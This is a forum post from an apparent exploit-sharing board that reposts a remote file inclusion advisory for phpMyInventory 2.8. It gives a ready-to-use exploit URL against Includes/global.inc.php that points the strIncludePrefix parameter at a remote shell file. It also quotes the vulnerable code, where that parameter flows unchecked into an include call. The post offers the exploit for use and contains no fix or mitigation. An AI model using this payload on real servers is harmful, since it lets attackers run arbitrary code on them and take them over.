Jump to content
Ras

phpMyInventory 2.8 (global.inc.php) RFI Vuln

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
########################################################################################
phpMyInventory (pmi)
v. 2.8
FOUND BY : o0xxdark0o
                   o0xxdark0o[at]msn.com
DOWNLOAD : [url]http://sourceforge.net/projects/phpmyinventory/[/url]
REMOTE FILE ICLUDE
########################################################################################
FILE :
PATH\Includes\global.inc.php
########################################################################################
EXPLOIT:
[url]www.xxx.com/pmi_v28/Includes/global.inc.php?strIncludePrefix=Shell.txt?[/url]
########################################################################################
CODE:
<?
 // where rare administrative emails will go
 $adminEmail  = "youraddress@yourdomain.com";

 $secureAdmin = 0; # set to 1 if SSL is available
 $sslPort = 443; # what port, if using SSL?

 $rowLimit = 12; # how many records any given page should show at one time

 # -------------------------------------------------------------------- #

 session_register("userID");
 session_register("sessionTime");
 session_register("sessionSecurity");

 // by creating a separate set of includes for different domain names,
 // you can serve multiple PMI's from one codebase.
 //
 // if ($SERVER_NAME = "dev.3gwt.net") {
 //    $includeFolder = "Includes/3gwt";
 // } else if ($SERVER_NAME = "www.foozball.com") {
 //    $includeFolder = "Includes/foozball";
 // } else {
       $includeFolder = "Includes";
 // }

 $strIncludePrefix = $strIncludePrefix.$includeFolder;
 Include($strIncludePrefix."/db.inc.php");
-----there is more of the code download to see it in v. 2.8-----
########################################################################################
BY : o0xxdark0o
      [email]o0xxdark0o@msn.com[/email]
########################################################################################
thanks for all my friends.. str0ke ... oxdo .... cold z3ro...keenest
[url]www.hach-teach.org[/url] - [url]www.3asfh.com[/url] - [url]www.goldenawy.com[/url] - [url]www.yee7.com[/url]
########################################################################################

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...